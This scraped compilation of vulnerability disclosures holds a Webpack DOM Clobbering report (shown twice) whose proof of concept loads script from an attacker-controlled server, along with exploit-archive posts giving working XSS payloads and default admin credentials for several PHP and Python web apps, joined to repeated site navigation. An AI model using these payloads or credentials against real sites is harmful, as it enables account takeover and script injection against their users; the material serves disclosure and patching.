Hi, Webpack developer team!

### Summary

We discovered a DOM Clobbering vulnerability in Webpack’s `AutoPublicPathRuntimeModule`. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an `img` tag with an unsanitized `name` attribute) are present.

We found the real-world exploitation of this gadget in the Canvas LMS which allows XSS attack happens through an javascript code compiled by Webpack (the vulnerable part is from Webpack). We believe this is a severe issue. If Webpack’s code is not resilient to DOM Clobbering attacks, it could lead to significant security vulnerabilities in any web application using Webpack-compiled code.


### Details

#### Backgrounds

DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:

[1] https://scnps.co/papers/sp23_domclob.pdf
[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/


#### Gadgets found in Webpack

We identified a DOM Clobbering vulnerability in Webpack’s `AutoPublicPathRuntimeModule`. When the `output.publicPath` field in the configuration is not set or is set to `auto`, the following code is generated in the bundle to dynamically resolve and load additional JavaScript files:

```
/******/ 	/* webpack/runtime/publicPath */
/******/ 	(() => {
/******/ 		var scriptUrl;
/******/ 		if (__webpack_require__.g.importScripts) scriptUrl = __webpack_require__.g.location + "";
/******/ 		var document = __webpack_require__.g.document;
/******/ 		if (!scriptUrl && document) {
/******/ 			if (document.currentScript)
/******/ 				scriptUrl = document.currentScript.src;
/******/ 			if (!scriptUrl) {
/******/ 				var scripts = document.getElementsByTagName("script");
/******/ 				if(scripts.length) {
/******/ 					var i = scripts.length - 1;
/******/ 					while (i > -1 && (!scriptUrl || !/^http(s?):/.test(scriptUrl))) scriptUrl = scripts[i--].src;
/******/ 				}
/******/ 			}
/******/ 		}
/******/ 		// When supporting browsers where an automatic publicPath is not supported you must specify an output.publicPath manually via configuration
/******/ 		// or pass an empty string ("") and set the __webpack_public_path__ variable from your code to use your own logic.
/******/ 		if (!scriptUrl) throw new Error("Automatic publicPath is not supported in this browser");
/******/ 		scriptUrl = scriptUrl.replace(/#.*$/, "").replace(/\?.*$/, "").replace(/\/[^\/]+$/, "/");
/******/ 		__webpack_require__.p = scriptUrl;
/******/ 	})();
```

However, this code is vulnerable to a DOM Clobbering attack. The lookup on the line with `document.currentScript` can be shadowed by an attacker, causing it to return an attacker-controlled HTML element instead of the current script element as intended. In such a scenario, the `src` attribute of the attacker-controlled element will be used as the `scriptUrl` and assigned to `__webpack_require__.p`. If additional scripts are loaded from the server, `__webpack_require__.p` will be used as the base URL, pointing to the attacker's domain. This could lead to arbitrary script loading from the attacker's server, resulting in severe security risks.

### PoC

Please note that we have identified a real-world exploitation of this vulnerability in the Canvas LMS. Once the issue has been patched, I am willing to share more details on the exploitation. For now, I’m providing a demo to illustrate the concept.

Consider a website developer with the following two scripts, `entry.js` and `import1.js`, that are compiled using Webpack:

```
// entry.js
import('./import1.js')
  .then(module => {
    module.hello();
  })
  .catch(err => {
    console.error('Failed to load module', err);
  });
```

```
// import1.js
export function hello () {
  console.log('Hello');
}
```

The webpack.config.js is set up as follows:
```
const path = require('path');

module.exports = {
  entry: './entry.js', // Ensure the correct path to your entry file
  output: {
    filename: 'webpack-gadgets.bundle.js', // Output bundle file
    path: path.resolve(__dirname, 'dist'), // Output directory
    publicPath: "auto", // Or leave this field not set
  },
  target: 'web',
  mode: 'development',
};
```

When the developer builds these scripts into a bundle and adds it to a webpage, the page could load the `import1.js` file from the attacker's domain, `attacker.controlled.server`. The attacker only needs to insert an `img` tag with the `name` attribute set to `currentScript`. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.

```
<!DOCTYPE html>
<html>
<head>
  <title>Webpack Example</title>
  <!-- Attacker-controlled Script-less HTML Element starts--!>
  <img name="currentScript" src="https://attacker.controlled.server/"></img>
  <!-- Attacker-controlled Script-less HTML Element ends--!>
</head>
<script src="./dist/webpack-gadgets.bundle.js"></script>
<body>
</body>
</html>
```

### Impact

This vulnerability can lead to cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or id attributes.

### Patch

A possible patch to this vulnerability could refer to the Google Closure project which makes itself resistant to DOM Clobbering attack: https://github.com/google/closure-library/blob/b312823ec5f84239ff1db7526f4a75cba0420a33/closure/goog/base.js#L174

```
/******/ 	/* webpack/runtime/publicPath */
/******/ 	(() => {
/******/ 		var scriptUrl;
/******/ 		if (__webpack_require__.g.importScripts) scriptUrl = __webpack_require__.g.location + "";
/******/ 		var document = __webpack_require__.g.document;
/******/ 		if (!scriptUrl && document) {
/******/ 			if (document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT') // Assume attacker cannot control script tag, otherwise it is XSS already :>
/******/ 				scriptUrl = document.currentScript.src;
/******/ 			if (!scriptUrl) {
/******/ 				var scripts = document.getElementsByTagName("script");
/******/ 				if(scripts.length) {
/******/ 					var i = scripts.length - 1;
/******/ 					while (i > -1 && (!scriptUrl || !/^http(s?):/.test(scriptUrl))) scriptUrl = scripts[i--].src;
/******/ 				}
/******/ 			}
/******/ 		}
/******/ 		// When supporting browsers where an automatic publicPath is not supported you must specify an output.publicPath manually via configuration
/******/ 		// or pass an empty string ("") and set the __webpack_public_path__ variable from your code to use your own logic.
/******/ 		if (!scriptUrl) throw new Error("Automatic publicPath is not supported in this browser");
/******/ 		scriptUrl = scriptUrl.replace(/#.*$/, "").replace(/\?.*$/, "").replace(/\/[^\/]+$/, "/");
/******/ 		__webpack_require__.p = scriptUrl;
/******/ 	})();
```

Please note that if we do not receive a response from the development team within three months, we will disclose this vulnerability to the CVE agent.

Hi, Webpack developer team!

**Summary**

We discovered a DOM Clobbering vulnerability in Webpack’s AutoPublicPathRuntimeModule. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present.

We found the real-world exploitation of this gadget in the Canvas LMS which allows XSS attack happens through an javascript code compiled by Webpack (the vulnerable part is from Webpack). We believe this is a severe issue. If Webpack’s code is not resilient to DOM Clobbering attacks, it could lead to significant security vulnerabilities in any web application using Webpack-compiled code.

**Details****Backgrounds**

DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:

\[1\] https://scnps.co/papers/sp23\_domclob.pdf  
\[2\] https://research.securitum.com/xss-in-amp4email-dom-clobbering/

**Gadgets found in Webpack**

We identified a DOM Clobbering vulnerability in Webpack’s AutoPublicPathRuntimeModule. When the output.publicPath field in the configuration is not set or is set to auto, the following code is generated in the bundle to dynamically resolve and load additional JavaScript files:

    /******/ 	/* webpack/runtime/publicPath */
    /******/ 	(() => {
    /******/ 		var scriptUrl;
    /******/ 		if (__webpack_require__.g.importScripts) scriptUrl = __webpack_require__.g.location + "";
    /******/ 		var document = __webpack_require__.g.document;
    /******/ 		if (!scriptUrl && document) {
    /******/ 			if (document.currentScript)
    /******/ 				scriptUrl = document.currentScript.src;
    /******/ 			if (!scriptUrl) {
    /******/ 				var scripts = document.getElementsByTagName("script");
    /******/ 				if(scripts.length) {
    /******/ 					var i = scripts.length - 1;
    /******/ 					while (i > -1 && (!scriptUrl || !/^http(s?):/.test(scriptUrl))) scriptUrl = scripts[i--].src;
    /******/ 				}
    /******/ 			}
    /******/ 		}
    /******/ 		// When supporting browsers where an automatic publicPath is not supported you must specify an output.publicPath manually via configuration
    /******/ 		// or pass an empty string ("") and set the __webpack_public_path__ variable from your code to use your own logic.
    /******/ 		if (!scriptUrl) throw new Error("Automatic publicPath is not supported in this browser");
    /******/ 		scriptUrl = scriptUrl.replace(/#.*$/, "").replace(/\?.*$/, "").replace(/\/[^\/]+$/, "/");
    /******/ 		__webpack_require__.p = scriptUrl;
    /******/ 	})();
    

However, this code is vulnerable to a DOM Clobbering attack. The lookup on the line with document.currentScript can be shadowed by an attacker, causing it to return an attacker-controlled HTML element instead of the current script element as intended. In such a scenario, the src attribute of the attacker-controlled element will be used as the scriptUrl and assigned to __webpack_require__.p. If additional scripts are loaded from the server, __webpack_require__.p will be used as the base URL, pointing to the attacker's domain. This could lead to arbitrary script loading from the attacker's server, resulting in severe security risks.

**PoC**

Please note that we have identified a real-world exploitation of this vulnerability in the Canvas LMS. Once the issue has been patched, I am willing to share more details on the exploitation. For now, I’m providing a demo to illustrate the concept.

Consider a website developer with the following two scripts, entry.js and import1.js, that are compiled using Webpack:

    // entry.js
    import('./import1.js')
      .then(module => {
        module.hello();
      })
      .catch(err => {
        console.error('Failed to load module', err);
      });
    

    // import1.js
    export function hello () {
      console.log('Hello');
    }
    

The webpack.config.js is set up as follows:

    const path = require('path');
    
    module.exports = {
      entry: './entry.js', // Ensure the correct path to your entry file
      output: {
        filename: 'webpack-gadgets.bundle.js', // Output bundle file
        path: path.resolve(__dirname, 'dist'), // Output directory
        publicPath: "auto", // Or leave this field not set
      },
      target: 'web',
      mode: 'development',
    };
    

When the developer builds these scripts into a bundle and adds it to a webpage, the page could load the import1.js file from the attacker's domain, attacker.controlled.server. The attacker only needs to insert an img tag with the name attribute set to currentScript. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.

    <!DOCTYPE html>
    <html>
    <head>
      <title>Webpack Example</title>
      <!-- Attacker-controlled Script-less HTML Element starts--!>
      <img name="currentScript" src="https://attacker.controlled.server/"></img>
      <!-- Attacker-controlled Script-less HTML Element ends--!>
    </head>
    <script src="./dist/webpack-gadgets.bundle.js"></script>
    <body>
    </body>
    </html>
    

**Impact**

This vulnerability can lead to cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or id attributes.

**Patch**

A possible patch to this vulnerability could refer to the Google Closure project which makes itself resistant to DOM Clobbering attack: https://github.com/google/closure-library/blob/b312823ec5f84239ff1db7526f4a75cba0420a33/closure/goog/base.js#L174

    /******/ 	/* webpack/runtime/publicPath */
    /******/ 	(() => {
    /******/ 		var scriptUrl;
    /******/ 		if (__webpack_require__.g.importScripts) scriptUrl = __webpack_require__.g.location + "";
    /******/ 		var document = __webpack_require__.g.document;
    /******/ 		if (!scriptUrl && document) {
    /******/ 			if (document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT') // Assume attacker cannot control script tag, otherwise it is XSS already :>
    /******/ 				scriptUrl = document.currentScript.src;
    /******/ 			if (!scriptUrl) {
    /******/ 				var scripts = document.getElementsByTagName("script");
    /******/ 				if(scripts.length) {
    /******/ 					var i = scripts.length - 1;
    /******/ 					while (i > -1 && (!scriptUrl || !/^http(s?):/.test(scriptUrl))) scriptUrl = scripts[i--].src;
    /******/ 				}
    /******/ 			}
    /******/ 		}
    /******/ 		// When supporting browsers where an automatic publicPath is not supported you must specify an output.publicPath manually via configuration
    /******/ 		// or pass an empty string ("") and set the __webpack_public_path__ variable from your code to use your own logic.
    /******/ 		if (!scriptUrl) throw new Error("Automatic publicPath is not supported in this browser");
    /******/ 		scriptUrl = scriptUrl.replace(/#.*$/, "").replace(/\?.*$/, "").replace(/\/[^\/]+$/, "/");
    /******/ 		__webpack_require__.p = scriptUrl;
    /******/ 	})();
    

Please note that if we do not receive a response from the development team within three months, we will disclose this vulnerability to the CVE agent.

**References**

*   GHSA-4vvj-4cpr-p986
*   https://nvd.nist.gov/vuln/detail/CVE-2024-43788
*   webpack/webpack@955e057
*   https://research.securitum.com/xss-in-amp4email-dom-clobbering
*   https://scnps.co/papers/sp23\_domclob.pdf

GHSA-4vvj-4cpr-p986: Webpack's AutoPublicPathRuntimeModule has a DOM Clobbering Gadget that leads to XSS

Medicine Tracker System version 1.0 suffers from an ignored default credential vulnerability.

**Medicine Tracker System 1.0 Insecure Settings**

Posted Aug 27, 2024

Authored by indoushka

Medicine Tracker System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | f581303aa2bf9febcf6dcf7c6c3d3a00468a34461c28597369ee71c12e489cbd

Download | Favorite | View

**Medicine Tracker System 1.0 Insecure Settings**

    ====================================================================================================================================| # Title     : Medicine Tracker System v1.0 Insecure Settings Vulnerability                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-mts_0.zip                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,561)
*   Arbitrary (16,904)
*   BBS (2,859)
*   Bypass (1,878)
*   CGI (1,034)
*   Code Execution (7,838)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,412)
*   DoS (25,122)
*   Encryption (2,389)
*   Exploit (53,299)
*   File Inclusion (4,265)
*   File Upload (1,000)
*   Firewall (822)
*   Info Disclosure (2,893)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (899)
*   Kernel (7,242)
*   Local (14,808)
*   Magazine (587)
*   Overflow (13,178)
*   Perl (1,435)
*   PHP (5,226)
*   Proof of Concept (2,394)
*   Protocol (3,731)
*   Python (1,647)
*   Remote (31,701)
*   Root (3,639)
*   Rootkit (528)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,031)
*   Shell (3,281)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,279)
*   SQL Injection (16,629)
*   TCP (2,444)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,021)
*   Web (9,974)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,267)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,110)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,913)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,631)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,781)
*   UNIX (9,441)
*   UnixWare (187)
*   Windows (6,676)
*   Other

Medicine Tracker System 1.0 Insecure Settings

Medical Hub Directory Site version 1.0 suffers from an ignored default credential vulnerability.

**Medical Hub Directory Site 1.0 Insecure Settings**

Posted Aug 27, 2024

Authored by indoushka

Medical Hub Directory Site version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | a870acea912fa724fa42e52acd620c835225fdc9bee4dbd5bdc81de51ec0acc3

Download | Favorite | View

**Medical Hub Directory Site 1.0 Insecure Settings**

    ====================================================================================================================================| # Title     : Medical Hub Directory Site v1.0 Insecure Settings Vulnerability                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.sourcecodester.com/php/15252/simple-medical-hub-directory-site-phpoop-source-code.html                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,561)
*   Arbitrary (16,904)
*   BBS (2,859)
*   Bypass (1,878)
*   CGI (1,034)
*   Code Execution (7,838)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,412)
*   DoS (25,122)
*   Encryption (2,389)
*   Exploit (53,299)
*   File Inclusion (4,265)
*   File Upload (1,000)
*   Firewall (822)
*   Info Disclosure (2,893)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (899)
*   Kernel (7,242)
*   Local (14,808)
*   Magazine (587)
*   Overflow (13,178)
*   Perl (1,435)
*   PHP (5,226)
*   Proof of Concept (2,394)
*   Protocol (3,731)
*   Python (1,647)
*   Remote (31,701)
*   Root (3,639)
*   Rootkit (528)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,031)
*   Shell (3,281)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,279)
*   SQL Injection (16,629)
*   TCP (2,444)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,021)
*   Web (9,974)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,267)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,110)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,913)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,631)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,781)
*   UNIX (9,441)
*   UnixWare (187)
*   Windows (6,676)
*   Other

Medical Hub Directory Site 1.0 Insecure Settings

Lodging Reservation Management System version 1.0 suffers from an ignored default credential vulnerability.

**Lodging Reservation Management System 1.0 Insecure Settings**

Posted Aug 27, 2024

Authored by indoushka

Lodging Reservation Management System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | feab3739cbf1410f9c44a493d074c6e6d9f127d93f1158c441c2ea24f02fe97f

Download | Favorite | View

**Lodging Reservation Management System 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : LRMS v1.0 Insecure Settings Vulnerability                                                                                   || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/14883/lodging-reservation-management-system-php-free-source-code.html                    |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,561)
*   Arbitrary (16,904)
*   BBS (2,859)
*   Bypass (1,878)
*   CGI (1,034)
*   Code Execution (7,838)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,412)
*   DoS (25,122)
*   Encryption (2,389)
*   Exploit (53,299)
*   File Inclusion (4,265)
*   File Upload (1,000)
*   Firewall (822)
*   Info Disclosure (2,893)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (899)
*   Kernel (7,242)
*   Local (14,808)
*   Magazine (587)
*   Overflow (13,178)
*   Perl (1,435)
*   PHP (5,226)
*   Proof of Concept (2,394)
*   Protocol (3,731)
*   Python (1,647)
*   Remote (31,701)
*   Root (3,639)
*   Rootkit (528)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,031)
*   Shell (3,281)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,279)
*   SQL Injection (16,629)
*   TCP (2,444)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,021)
*   Web (9,974)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,267)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,110)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,913)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,631)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,781)
*   UNIX (9,441)
*   UnixWare (187)
*   Windows (6,676)
*   Other

Lodging Reservation Management System 1.0 Insecure Settings

A cross-site scripting (XSS) vulnerability in the Create Product function of fastapi-admin pro v0.1.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Product Name parameter.

**FastAPI Admin cross-site scripting (XSS) vulnerability in the Create Product function**

Moderate severity GitHub Reviewed Published Aug 26, 2024 to the GitHub Advisory Database • Updated Aug 26, 2024

GHSA-22xm-w7r2-834q: FastAPI Admin cross-site scripting (XSS) vulnerability in the Create Product function

A cross-site scripting (XSS) vulnerability in the Config-Create function of fastapi-admin pro v0.1.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Product Name parameter.

**FastAPI Admin Cross-site Scripting vulnerability in the Config-Create function**

Moderate severity GitHub Reviewed Published Aug 26, 2024 to the GitHub Advisory Database • Updated Aug 26, 2024

GHSA-grqx-r2q2-j425: FastAPI Admin Cross-site Scripting vulnerability in the Config-Create function

Calibre Web version 0.6.21 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Stored XSS in Calibre-web# Date: 07/05/2024# Exploit Authors: Pentest-Tools.com (Catalin Iovita & Alexandru Postolache)# Vendor Homepage: (https://github.com/janeczku/calibre-web/)# Version: 0.6.21 - Romesa# Tested on: Linux 5.15.0-107, Python 3.10.12, lxml  4.9.4# CVE: CVE-2024-39123## Vulnerability DescriptionCalibre-web 0.6.21 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session.## Steps to Reproduce1. Log in to the application.2. Upload a new book.3. Access the Books List functionality from the `/table?data=list&sort_param=stored` endpoint.4. In the `Comments` field, input the following payload:    <a href=javas%1Bcript:alert()>Hello there!</a>4. Save the changes.5. Upon clicking the description on the book that was created, in the Book Details, the payload was successfully injected in the Description field. By clicking on the message, an alert box will appear, indicating the execution of the injected script.

Calibre Web 0.6.21 Cross Site Scripting

Helpdeskz version 2.0.2 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Stored XSS Vulnerability via File Name# Google Dork: N/A# Date: 08 Aug 2024# Exploit Author: Md. Sadikul Islam# Vendor Homepage: https://www.helpdeskz.com/# Software Link:https://github.com/helpdesk-z/helpdeskz-dev/archive/2.0.2.zip# Version: v2.0.2# Tested on: Kali Linux /  Firefox 115.1.0esr (64-bit)# CVE : N/APayload: "><img src=x onerror=alert(1);>Filename can be Payload: "><img src=x onerror=alert(1);>.jpgVIdeo PoC:https://drive.google.com/file/d/1_yh0UsX8h7YcSU1kFvg_bBwk9T7kx1K1/view?usp=drive_linkSteps to Reproduce:    1. Log in as a regular user and create a new ticket.    2. Fill out all the required fields with the necessary information.    3. Attach an image file with a malicious payload embedded in thefilename.    4. Submit the ticket.    5. Access the ticket from the administration panel to trigger thepayload execution.Cross-Site Scripting (XSS) exploits can compromise the administrationpanel, directly affecting administrators by allowing malicious scripts toexecute within their privileged environment.

Helpdeskz 2.0.2 Cross Site Scripting

Jobs Finder System version 1.0 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : Jobs Finder System v1.0 XSS injection Vulnerability                                                                         || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://download-media.code-projects.org/2020/04/Jobs_Finder_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip             |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /job.php?id=5'%22()%26%25<acx><ScRiPt%20>prompt(966215)</ScRiPt>[+] http://127.0.0.1/jobportal-master/job.php?id=5'%22()%26%25<acx><ScRiPt%20>prompt(966215)</ScRiPt>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Jobs Finder System 1.0 Cross Site Scripting

Human Resource Management System version 2024 version 1.0 suffers from a cross site scripting vulnerability.

**Human Resource Management System 2024 1.0 Cross Site Scripting**

Posted Aug 26, 2024

Authored by indoushka

Human Resource Management System version 2024 version 1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 25f4d7b7ca25178696d74bb308a9abcdd65caa3fc6c471e46b4b16febaa084ea

Download | Favorite | View

**Human Resource Management System 2024 1.0 Cross Site Scripting**

    =============================================================================================================================================| # Title     : Human Resource Management System 2024 v1.0 XSS Vulnerability                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload :index.php?msg=Username%2520and%2520Password%2520is%2520Wrong!'"()%26%25<acx><ScRiPt >prompt(926738)</ScRiPt>[+] http://127.0.0.1/hrm/index.php?msg=Username%2520and%2520Password%2520is%2520Wrong!'"()%26%25<acx><ScRiPt >prompt(926738)</ScRiPt>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,543)
*   Arbitrary (16,904)
*   BBS (2,859)
*   Bypass (1,875)
*   CGI (1,034)
*   Code Execution (7,834)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,412)
*   DoS (25,116)
*   Encryption (2,389)
*   Exploit (53,289)
*   File Inclusion (4,263)
*   File Upload (1,000)
*   Firewall (822)
*   Info Disclosure (2,893)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (899)
*   Kernel (7,239)
*   Local (14,807)
*   Magazine (587)
*   Overflow (13,177)
*   Perl (1,435)
*   PHP (5,226)
*   Proof of Concept (2,394)
*   Protocol (3,731)
*   Python (1,646)
*   Remote (31,695)
*   Root (3,639)
*   Rootkit (528)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,031)
*   Shell (3,281)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,279)
*   SQL Injection (16,625)
*   TCP (2,444)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,016)
*   Web (9,973)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,267)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,109)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,895)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,615)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,780)
*   UNIX (9,441)
*   UnixWare (187)
*   Windows (6,676)
*   Other

Tag

#xss